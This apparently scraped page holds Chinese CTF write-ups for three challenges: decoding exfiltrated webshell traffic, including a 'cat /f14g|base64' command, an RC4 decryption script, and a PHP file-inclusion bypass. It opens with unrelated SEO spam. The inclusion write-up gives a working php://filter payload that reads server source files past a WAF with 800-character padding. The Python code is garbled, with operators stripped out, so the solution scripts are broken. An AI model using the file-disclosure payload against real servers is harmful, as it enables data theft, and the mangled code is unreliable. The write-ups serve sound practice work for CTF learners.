哪个学校有网站建设,如何使用华为云虚拟主机建设网站,万网域名注册查询网,做视频哪个网站收入高[GKCTF 2021]签到
wireshark跟踪http流#xff0c;基本编解码#xff0c;倒叙#xff0c;栅栏密码 找到cat /f14g 把包里返回的字符串先hex解码#xff0c;再base64解码#xff0c;看到一个时间是倒叙#xff0c;不含flag 继续往下面翻#xff0c;可以看到cat%2Ff14g%7…[GKCTF 2021]签到
wireshark跟踪http流基本编解码倒叙栅栏密码 找到cat /f14g 把包里返回的字符串先hex解码再base64解码看到一个时间是倒叙不含flag 继续往下面翻可以看到cat%2Ff14g%7Cbase64的包 继续解码发现像base64编码后的字符串但是直接解码无法得到想要的结果 观察最后一行结合上一个解码出来的含有时间倒叙的字符串可推断字符串被镜像倒叙了利用python编写exp awIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD
jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjM
t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0iCNMyIjMyIjMyIjMyI
6AjMgAzMtMDMtEjMwIjO0eZ62ep5K0wKrQWYwVGdv5EItAiM1Aydl5mK6M6jlfpqnrQDt0SLt0SL
t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLK0AIdZavo75mlvlCNMTM6EDM
z0yMw0SMyAjM6Q7lpb7lmrQDrsCZhBXZ09mTg0CIyUDI3VmbqozoPWlqeuCN0SLt0SLt0SLt0SL
sxWZld1V913e7d2ZhFGbsZmZg0lp9iunbWWg0lp9iunbWWg0lp9iunbWWK0wMxoTMwoDMyACM
DN0QDN0QDlWazNXMx0Wbf9lRGRDNDN0ard0Rf9VZl1WbwADIdRampDKilvFIdRampDKilvVKpM2Y
QIhM0QDN0Q
a1 a.split(\n)
# print(a1)a2
for i in a1:a2i[::-1]print(i[::-1])# print(a2)
# print(i[::-1])
import base64
a3base64.b64decode(a2)
# print(a3)
# print(\n)
# print(\n)
print(a3.decode())# flag{Welc0me_GkC4F_m1siCCCCCC!}
# NSSCTF{Welc0me_GkC4F_m1siCCCCCC!}
NSSCTF{Welc0me_GkC4F_m1siCCCCCC!}
[SWPUCTF 2021 新生赛]简简单单的解密 解密步骤应该是URL解码Base64解码RC4解密因为RC4是对称加密使用相同密钥可以解密
从给定的URL码进行反推
enc %C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA
import base64, urllib.parse# 已知参数
key HereIsFlagggg
enc %C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA# URL解码
dec urllib.parse.unquote(enc)# RC4解密函数
def rc4_decrypt(key, cipher):# 初始化S盒s_box list(range(256))j 0for i in range(256):j (j s_box[i] ord(key[i % len(key)])) % 256s_box[i], s_box[j] s_box[j], s_box[i]# 解密res []i j 0for c in cipher:i (i 1) % 256j (j s_box[i]) % 256s_box[i], s_box[j] s_box[j], s_box[i]t (s_box[i] s_box[j]) % 256k s_box[t]res.append(chr(ord(c) ^ k))return .join(res)# 执行解密
flag rc4_decrypt(key, dec)
print(解密结果, flag) NSSCTF{REAL_EZ_RC4}
[鹏城杯 2022]简单包含 我们传参试试
flagphp://filter/readconvert.base64-encode/resourceflag.php 然后出现了一个waf
那我们再换一个思路先查看它的源代码
flagphp://filter/readconvert.base64-encode/resourceindex.php 我们去解密一下 这个代码是让我们再伪协议前面加上800个字符才能访问
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflagphp://filter/readconvert.base64-encode/resource/var/www/html/flag.php 我们去解密一下 NSSCTF{f0207dc4-47d0-42e2-9768-61a90831ee74}
